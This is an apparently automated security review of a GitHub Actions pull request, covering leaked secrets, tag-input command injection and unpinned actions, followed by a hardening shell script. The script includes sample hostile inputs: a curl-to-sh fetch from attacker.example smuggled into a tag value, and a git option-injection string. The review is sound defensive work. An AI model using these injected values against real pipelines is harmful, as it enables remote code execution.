This pull request contains multiple critical security vulnerabilities, including hardcoded PostgreSQL credentials, exposed AWS secret keys in workflow logs, potential command injection through unvalidated tag input, and the use of GitHub Actions without pinned commit hashes, which could lead to supply chain attacks.
✨ Code Policies (3)
Policy: hardcoded-creds
Result: Yes, the change includes hard-coded credentials in the postgres service configuration within the test job. Specifically, it contains hard-coded values for POSTGRES_USER: 'postgres' and POSTGRES_PASSWORD: 'postgres', as well as these same credentials in the DATABASE_URL environment variable.
Guidance: refer issues to the security team

Policy: GitHub Actions Security Policy
Result: Yes, this GitHub Actions workflow has multiple security issues:
1. Line 83: Direct exposure of AWS secret via echo command: echo "AWS secret key is ${{ secrets.AWS_SECRET_ACCESS_KEY }}"
2. Lines 85-87: Command injection vulnerability via unsanitized tag input: git checkout ${{ github.event.inputs.tag }}. The workflow_dispatch input 'tag' is used directly in a git command without validation.
3. Multiple third-party actions used without pinned commit hashes:
   - Line 29: actions/checkout@v4
   - Line 32: ruby/setup-ruby@v1
   - Line 71: actions/cache@v3
   - Line 142: slackapi/slack-github-action@v1
   Using version tags instead of commit hashes allows for potential supply chain attacks if the action is compromised.
4. Line 41: Checkout of private repo using GH_TOKEN secret: While not inherently unsafe, the token permissions should be restricted to minimum required access.

Policy: test-check
Result: Yes, there is a concerning logging issue in the GitHub workflow file. On line 85, there is an explicit logging of an AWS secret access key using 'echo "AWS secret key is ${{ secrets.AWS_SECRET_ACCESS_KEY }}"'. This logs a sensitive credential directly to the workflow logs, which is a serious security risk as it could expose AWS access credentials.
Guidance: bad code
💭 Unconfirmed Findings (2)
Vulnerability: Potential Command Injection via Unvalidated Tag Input
Description: A security vulnerability in the GitHub Actions workflow where user-provided tag input can be used to inject arbitrary commands or check out unintended branches/commits. Located in .github/workflows/main.yaml, this poses a significant risk of command injection due to lack of proper input validation.

Vulnerability: Secret Exposure in Workflow Logs
Description: A critical security issue where sensitive AWS credentials are explicitly printed to GitHub Actions logs, potentially exposing confidential authentication information to unauthorized parties. This vulnerability is located in .github/workflows/main.yaml and could lead to unauthorized access to AWS resources.
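The command-injection finding above comes down to one mechanism: `${{ github.event.inputs.tag }}` is expanded by GitHub into the text of the `run:` script before the shell ever sees it, so the input is code, not data. The fix GitHub itself documents is to pass the input through an `env:` entry and read it as a quoted shell variable, then validate it before it reaches git. The script below is an added example written for this review; it is not code from the pull request or from the repository's workflow. The tag pattern (v1.2.3 with an optional -rc suffix), the function names and the attacker URL are assumptions chosen for illustration.

```shell
#!/bin/sh
# Added example, not code from the pull request under review. Demonstrates
# validating a workflow_dispatch "tag" input before it is handed to git, and
# contrasts the ${{ }}-expanded (unsafe) step with the env-var (safe) step.
set -eu

# Accept only release-style tags such as v1.2.3 or v1.2.3-rc1 (max 64 chars).
# Rejects empty input, over-long input, anything beginning with "-" (git would
# read it as an option such as --upload-pack) and every shell metacharacter,
# since the allow-list regex admits none of them. The pattern is an assumption
# for this example; adjust it to the project's real tagging scheme.
validate_tag() {
  tag="$1"
  if [ "${#tag}" -eq 0 ] || [ "${#tag}" -gt 64 ]; then
    return 1
  fi
  case "$tag" in
    -*) return 1 ;;
  esac
  printf '%s\n' "$tag" | grep -Eq '^v[0-9]+\.[0-9]+\.[0-9]+(-[A-Za-z0-9.]+)?$'
}

# Text wrapper around validate_tag: prints "accept" or "reject".
tag_verdict() {
  if validate_tag "$1"; then echo accept; else echo reject; fi
}

# What the vulnerable step becomes after GitHub's template expansion: the raw
# input is spliced into the shell source, so "v1.0.0; curl ... | sh" is two
# commands. This function only renders that text so the problem is visible;
# it never executes it.
render_unsafe_step() {
  tag_input="$1"
  printf 'git checkout %s\n' "$tag_input"
}

# Hardened step. The workflow sets
#   env:
#     TAG: ${{ github.event.inputs.tag }}
# and the step runs: safe_checkout "$TAG"
# The input therefore arrives as an argument, not as code. The refs/tags/
# prefix removes any ambiguity with branches or options, and rev-parse
# --verify confirms the tag exists before anything is checked out.
safe_checkout() {
  tag="$1"
  if ! validate_tag "$tag"; then
    echo "refusing to check out invalid tag input: $tag" >&2
    return 1
  fi
  git rev-parse --verify --quiet "refs/tags/$tag^{commit}" >/dev/null || {
    echo "tag does not exist: $tag" >&2
    return 1
  }
  git -c advice.detachedHead=false checkout --detach "refs/tags/$tag"
}

# Demonstration (git-free) when the script is run directly.
INJECTED='v1.0.0; curl http://attacker.example/x | sh'   # constructed input
echo "release tag v1.2.3:          $(tag_verdict v1.2.3)"
echo "injected input:              $(tag_verdict "$INJECTED")"
echo "option-looking input:        $(tag_verdict '--upload-pack=touch pwned')"
echo "expanded unsafe step would run: $(render_unsafe_step "$INJECTED")"
```

In the workflow, the `run:` line becomes `./scripts/checkout_tag.sh "$TAG"` (path assumed) with `TAG` supplied under `env:`; the same allow-list approach applies to any other `workflow_dispatch` input, `issue` title or PR body that a step interpolates.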